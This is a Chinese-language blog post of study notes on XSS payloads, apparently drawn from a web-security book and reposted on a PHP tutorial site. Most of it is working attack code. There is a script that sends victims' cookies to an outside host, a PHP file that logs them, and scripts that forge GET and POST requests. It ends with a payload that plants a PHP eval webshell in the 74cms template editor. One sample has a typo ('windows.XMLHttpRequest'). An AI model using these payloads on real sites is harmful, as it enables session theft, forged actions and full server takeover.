来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。1.盗取cookie,发起cookie劫持使用xss漏洞插入cookie.jscookie.js代码:view sourceprint?1 var img = document.cr......
|
xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。
1.盗取cookie,发起cookie劫持 使用xss漏洞插入cookie.js cookie.js代码:
view sourceprint?1 var img = document.createElement("img"); 2 3 img.src = "http:// www.2cto.com /cookie.php?cookie="+escape(document.cookie); 4 5 document.body.appendChild(img);
cookie.php代码
view sourceprint?1 <?php 2 3 $file = fopen("cookie.txt","a"); 4 5 fwrite($file,$_GET['cookie']); 6 7 fclose($file); 8 9 ?>
2.构造GET和POST请求 get.js代码:
view sourceprint?1 var img = document.createElement("img"); 2 3 img.src = "一个可以使用的get请求链接"; 4 5 document.body.appendChild(img);
post.js代码: 代码1:(DOM节点方式)
view sourceprint?01 var f = document.createElement("form"); 02 03 f.action =""; 04 05 f.method = "post"; 06 07 document.body.appendChild(f); 08 09 var i1 = document.createElement("input"); 10 11 i1.name = "xxx"; 12 13 i1.value = "xxxx"; 14 15 f.appendChild(i1); 16 17 var i2 = document.createElement("input"); 18 19 i2.name = "aaa"; 20 21 i2.value = "aaa"; 22 23 f.appendChild(i2); 24 25 f.submit();
代码2:
view sourceprint?1 var dd = document.createElement("div"); 2 3 document.body.appendChild(dd); 4 5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>'; 6 7 document.getElementById("xssform").submit();
代码3:(使用XMLHttpRequest)
view sourceprint?01 var url = "http://lanu.sinaapp.com"; 02 03 var postStr = "aaa=aaaa&xxx=xxxx"; 04 05 var ajax = null; 06 07 if(windows.XMLHttpRequest) 08 09 { 10 11 ajax = new XMLHttpRequest(); 12 13 } 14 15 else if(window.ActiveXObject) 16 17 { 18 19 ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本 20 21 } 22 23 else 24 25 { 26 27 return; 28 29 } 30 31 ajax.open("POST", url , true); 32 33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 34 35 ajax.send(postStr); 36 37 //ajax.open("GET", url, true); 38 39 //ajax.send(null); 40 41 ajax.onreadystatechange = function() 42 43 { 44 45 if(ajax.readyState == 4 && ajax.status == 200) 46 47 { 48 49 //alert("Done!"); 50 51 } 52 53 } ------------------- 3.xss钓鱼 4.浏览器识别和用户安装软件识别 http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/ 5.css history hack http://ha.ckers.org/weird/CSS-history-hack.html
读《白帽子讲web安全》笔记 --------------------- xxs payload getshell 实例: 骑士cms getshell
view sourceprint?01 //构造好的能写入一句话的连接 02 03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6'; 04 05 try 06 07 { 08 09 //调用XMLHttpRequest 10 var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); 11 12 xml.open("POST",'admin_templates.php?act=do_edit',false); 13 xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); 14 xml.onreadystatechange = function() 15 { 16 if(xml.readyState == 4) 17 18 { 19 20 } 21 } 22 xml.send(Shelldata); 23 } 24 catch(e) 25 26 { 27 28 } 作者 L.N的博客 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
